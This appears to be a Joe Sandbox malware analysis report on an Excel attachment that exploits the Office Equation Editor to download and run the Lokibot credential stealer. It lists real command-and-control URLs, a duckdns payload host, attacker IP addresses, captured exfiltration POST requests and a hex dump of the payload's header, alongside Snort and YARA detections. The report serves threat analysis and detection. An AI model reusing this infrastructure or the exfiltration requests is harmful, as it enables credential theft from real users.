Loading ...

Play interactive tourEdit tour

Analysis Report F-A Payment 20-26 force.xlsx

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:216498
Start date:19.03.2020
Start time:13:18:03
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 49s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:F-A Payment 20-26 force.xlsx
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.expl.evad.winXLSX@5/8@6/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 89% (good quality ratio 85.2%)
  • Quality average: 76.6%
  • Quality standard deviation: 29%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Timeout during Intezer genetic analysis for unpackpe/3.2.vbc.exe.190000.1.unpack

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Lokibot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExploitation for Client Execution13Winlogon Helper DLLAccess Token Manipulation1Masquerading1Credential Dumping2Virtualization/Sandbox Evasion1Remote File Copy15Email Collection1Data Encrypted1Standard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaGraphical User Interface1Port MonitorsProcess Injection11Disabling Security Tools1Credentials in Registry2Security Software Discovery12Remote ServicesMan in the Browser1Exfiltration Over Other Network MediumRemote File Copy15Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionSoftware Packing2Input CaptureRemote System Discovery1Windows Remote ManagementData from Local System2Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingVirtualization/Sandbox Evasion1Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol124SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessAccess Token Manipulation1Account ManipulationSystem Information Discovery23Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceProcess Injection11Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskDeobfuscate/Decode Files or Information1Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionObfuscated Files or Information21Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: vbc.exe.2276.3.memstrMalware Configuration Extractor: Lokibot {"c2:": "http://cpf-th.com/dark/five/fre.php"}
Multi AV Scanner detection for domain / URLShow sources
Source: cpf-th.comVirustotal: Detection: 8%Perma Link
Source: http://cpf-th.com/dark/five/fre.phpVirustotal: Detection: 11%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exeVirustotal: Detection: 25%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: F-A Payment 20-26 force.xlsxVirustotal: Detection: 38%Perma Link
Source: F-A Payment 20-26 force.xlsxReversingLabs: Detection: 24%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vbc.exeJoe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vbc.exeJump to behavior
Office Equation Editor has been startedShow sources
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: green9wsdyelectronicsandkitchenappliance.duckdns.org
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 103.133.106.239:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 103.133.106.239:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49161 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49161 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49161 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49161 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49162 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49162 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49162 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49162 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49163 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49163 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49163 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49163 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.143.138.47:80 -> 192.168.2.2:49163
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49164 -> 185.147.80.213:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49164 -> 185.147.80.213:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49164 -> 185.147.80.213:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49164 -> 185.147.80.213:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49165 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49165 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49165 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49165 -> 45.143.138.47:80
Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.143.138.47:80 -> 192.168.2.2:49165
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: green9wsdyelectronicsandkitchenappliance.duckdns.org
Domain name seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDomain Name: green9wsdyelectronicsandkitchenappliance.duckdns.org green9wsdyelectronicsandkitchenappliance.duckdns.org
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Mar 2020 12:20:21 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Mar 2020 10:25:02 GMTETag: "101c00-5a13294f1b971"Accept-Ranges: bytesContent-Length: 1055744Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 aa 09 c0 9e ee 68 ae cd ee 68 ae cd ee 68 ae cd 70 c8 69 cd e9 68 ae cd 1f ae 63 cd db 68 ae cd 1f ae 60 cd 53 68 ae cd 1f ae 61 cd d7 68 ae cd e7 10 2d cd b3 68 ae cd ee 68 af cd fa 69 ae cd 12 1f 17 cd c7 68 ae cd 88 86 7d cd e9 68 ae cd 88 86 67 cd ef 68 ae cd ee 68 39 cd ef 68 ae cd 88 86 62 cd ef 68 ae cd 52 69 63 68 ee 68 ae cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 eb c9 72 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0b 00 00 1e 07 00 00 fa 08 00 00 00 00 00 24 a5 05 00 00 10 00 00 00 30 07 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 38 94 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 08 00 a4 01 00 00 00 30 09 00 1c 3b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 af 08 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 6c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 db 1c 07 00 00 10 00 00 00 1e 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d6 a5 01 00 00 30 07 00 00 a6 01 00 00 22 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 41 00 00 00 e0 08 00 00 18 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 1c 3b 07 00 00 30 09 00 00 3c 07 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /office360/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: green9wsdyelectronicsandkitchenappliance.duckdns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /dark/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: cpf-th.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B0D737F8Content-Length: 174Connection: close
Source: global trafficHTTP traffic detected: POST /dark/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: cpf-th.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B0D737F8Content-Length: 174Connection: close
Source: global trafficHTTP traffic detected: POST /dark/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: cpf-th.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B0D737F8Content-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /dark/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: cpf-th.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B0D737F8Content-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /dark/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: cpf-th.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B0D737F8Content-Length: 147Connection: close
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_00404ED4 recv,3_2_00404ED4
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\99303755.emfJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /office360/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: green9wsdyelectronicsandkitchenappliance.duckdns.orgConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: green9wsdyelectronicsandkitchenappliance.duckdns.org
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /dark/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: cpf-th.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B0D737F8Content-Length: 174Connection: close
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Mar 2020 12:20:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/7.4.2RC1Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Urls found in memory or binary dataShow sources
Source: vbc.exe, 00000003.00000002.1054548644.0049F000.00000004.00020000.sdmpString found in binary or memory: http://cpf-th.com/dark/five/fre.php
Source: vbc.exe, vbc.exe, 00000003.00000003.1039184291.02160000.00000004.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
Source: vbc.exe, 00000003.00000000.974870879.00473000.00000002.00020000.sdmp, regasm[1].exe.1.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing" from 26 protected documents the yellow bar above 27 28 29 30 31 . D 32 33
Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 27 28 29 30 31 . D 32 33 34 35 36 + taj tg %5 x 5
Office equation editor drops PE fileShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exeJump to dropped file
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_0040549C3_2_0040549C
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_004029D43_2_004029D4
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: F-A Payment 20-26 force.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe 5C14B0306FF36F187D26A02EE087872C1447E33DCBF424C59F17A2B971D8D9B6
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\vbc.exe 5C14B0306FF36F187D26A02EE087872C1447E33DCBF424C59F17A2B971D8D9B6
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: String function: 00405B6F appears 42 times
PE file contains strange resourcesShow sources
Source: regasm[1].exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
Yara signature matchShow sources
Source: 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@5/8@6/4
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$F-A Payment 20-26 force.xlsxJump to behavior
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\09E3E1D85CB65E97AFA24C0A
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBE68.tmpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: F-A Payment 20-26 force.xlsxVirustotal: Detection: 38%
Source: F-A Payment 20-26 force.xlsxReversingLabs: Detection: 24%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
Source: unknownProcess created: C:\Windows\System32\mspaint.exe C:\Windows\system32\mspaint.exe -Embedding
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe' Jump to behavior
Uses Rich Edit ControlsShow sources
Source: C:\Windows\System32\mspaint.exeFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Document has a 'vbamacros' value indicative of goodwareShow sources
Source: F-A Payment 20-26 force.xlsxInitial sample: OLE indicators vbamacros = False
Document has an 'encrypted' value indicative of goodwareShow sources
Source: F-A Payment 20-26 force.xlsxInitial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeUnpacked PE file: 3.2.vbc.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeUnpacked PE file: 3.2.vbc.exe.400000.2.unpack
Yara detected aPLib compressed binaryShow sources
Source: Yara matchFile source: 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1054527862.00415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2276, type: MEMORY
Source: Yara matchFile source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
